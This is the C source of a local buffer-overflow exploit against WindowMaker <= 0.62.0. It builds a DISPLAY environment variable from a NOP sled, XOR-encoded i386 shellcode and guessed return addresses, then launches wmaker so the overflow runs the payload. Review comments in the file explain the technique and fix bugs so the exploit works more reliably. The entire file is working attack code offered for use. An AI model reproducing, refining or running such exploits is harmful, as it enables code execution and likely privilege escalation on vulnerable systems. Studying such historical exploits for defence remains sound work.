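/*
 * WindowMaker <= 0.62.0 (and maybe newer) DISPLAY overflow by SectorX of XOR TEAM.
 * For more information please refer to XOR TEAM's homepage at http://xorteam.cjb.net
 *
 * note: i supplied the offset 0x4 since it worked for me, but it most likely
 * wont work for you since my WindowMaker code is modified and self compiled.
 * if you find an offset on any precompiled binaries please let me know, thanx.
 *
 * How it works: a LEN-byte string laid out as
 *
 *     [NOP sled][shellcode][TAIL_ADDRS bytes of the guessed return address]
 *
 * is exported as DISPLAY and wmaker is started through system().  The guessed
 * address is this process's own stack pointer plus OFFSET; that only
 * approximates the target's stack because wmaker is exec'd from here with a
 * near-identical environment.  NOTE(review): this assumes a non-randomised
 * stack and a 32-bit x86 target (the payload is i386 code); it will not land
 * on an ASLR-enabled or 64-bit system, and the offset is target-specific.
 *
 * Review fixes vs. the original listing: the stripped #include lines are
 * restored; the buffer is NUL-terminated (setenv() previously read past its
 * end looking for a terminator); the address fill no longer goes through a
 * `long *` cast (8-byte stores on an LP64 build host overran the buffer and
 * the cast is aliasing UB); the printf format matches its arguments;
 * get_sp() actually returns a value; argv[1] is validated; and the
 * setenv()/system() results are checked.
 */
#define _POSIX_C_SOURCE 200112L   /* setenv() */

#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP        0x90   /* x86 single-byte nop used for the landing sled */
#define LEN        1004   /* length of the DISPLAY value, excluding the NUL */
#define OFFSET     0x4    /* default delta added to get_sp() to hit the sled */
#define TAIL_ADDRS 50     /* bytes after the payload left as address copies */

/*
 * i386 payload.  The leading bytes appear to be a small self-decoding stub
 * (xor byte [esi],1 in a loop) followed by an XOR-0x01 encoded body; the
 * encoding keeps NUL bytes out of the string so it survives as an
 * environment-variable value.  Do not edit: changing its length shifts the
 * layout computed in main().
 */
char shellcode[] =
    "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0d\x31\xc9\xb1\x6c\x80\x36\x01\x46\xe2\xfa"
    "\xea\x09\x2e\x63\x68\x6f\x2e\x72\x69\x01\x80\xed\x66\x2a\x01\x01"
    "\x54\x88\xe4\x82\xed\x1d\x56\x57\x52\xe9\x01\x01\x01\x01\x5a\x80\xc2\xc7\x11"
    "\x01\x01\x8c\xba\x1f\xee\xfe\xfe\xc6\x44\xfd\x01\x01\x01\x01\x88\x7c\xf9\xb9"
    "\x47\x01\x01\x01\x30\xf7\x30\xc8\x52\x88\xf2\xcc\x81\x8c\x4c\xf9\xb9\x0a\x01"
    "\x01\x01\x88\xff\x30\xd3\x52\x88\xf2\xcc\x81\x30\xc1\x5a\x5f\x5e\x88\xed\x5c"
    "\xc2\x91";

/* The layout arithmetic in main() silently wraps if these do not hold. */
_Static_assert(LEN % 4 == 0, "LEN must be a whole number of 4-byte addresses");
_Static_assert(sizeof shellcode - 1 + TAIL_ADDRS < LEN, "shellcode does not fit in LEN");

/*
 * Return the current stack pointer (i386: %esp).
 *
 * The original left the value in %eax with no return statement, which is
 * undefined behaviour; the output constraint makes the data flow explicit.
 * Only meaningful on x86, which the i386 payload already requires.
 */
long get_sp(void)
{
    long sp;
    __asm__ volatile ("mov %%esp, %%eax" : "=a"(sp));
    return sp;
}

/*
 * Build the overflow string, export it as DISPLAY and launch wmaker.
 *
 * argv[1], if present, overrides OFFSET (decimal, as before).  Returns 0
 * once wmaker has been spawned, 1 if the offset is malformed or if
 * setenv()/system() fail.
 */
int main(int argc, char *argv[])
{
    char buffer[LEN + 1];   /* +1: setenv() needs a NUL-terminated string */
    long stack = get_sp();
    long offset = OFFSET;
    size_t sc_len = strlen(shellcode);
    size_t sled_len = LEN - sc_len - TAIL_ADDRS;   /* positive by the _Static_assert */
    uint32_t addr;
    size_t i;

    fprintf(stderr, "WindowMaker overflow by SectorX\n\n");

    if (argc > 1) {
        /* strtol instead of atoi so garbage is rejected rather than read as 0 */
        char *end;
        errno = 0;
        offset = strtol(argv[1], &end, 10);
        if (end == argv[1] || *end != '\0' || errno == ERANGE) {
            fprintf(stderr, "bad offset: %s\n", argv[1]);
            return 1;
        }
    }

    /* Pre-fill the whole buffer with the guessed return address.  A 4-byte
     * memcpy replaces `*(long *)&buffer[i] = ...`: same bytes on the i386
     * target, but no 8-byte overrun on an LP64 host and no aliasing UB.
     * NOTE: the address (and the payload) must contain no 0x00 byte, or the
     * environment string is cut short there. */
    addr = (uint32_t)(stack + offset);
    for (i = 0; i < LEN; i += sizeof addr)
        memcpy(&buffer[i], &addr, sizeof addr);

    /* Sled, then payload; the final TAIL_ADDRS bytes keep the address copies. */
    memset(buffer, NOP, sled_len);
    memcpy(buffer + sled_len, shellcode, sc_len);
    buffer[LEN] = '\0';

    printf("Using address 0x%lx, offset = 0x%lx\n",
           (unsigned long)addr, (unsigned long)offset);

    printf("Setting environment variable ... ");
    if (setenv("DISPLAY", buffer, 1) != 0) {
        perror("setenv");
        return 1;
    }
    printf("done\n\n");

    /* Absolute path, so no PATH lookup; the shell spawned by system()
     * inherits DISPLAY and hands it to wmaker. */
    if (system("/usr/local/bin/wmaker") == -1) {
        perror("system");
        return 1;
    }
    return 0;
}
/* www.hack.co.za [2000]*/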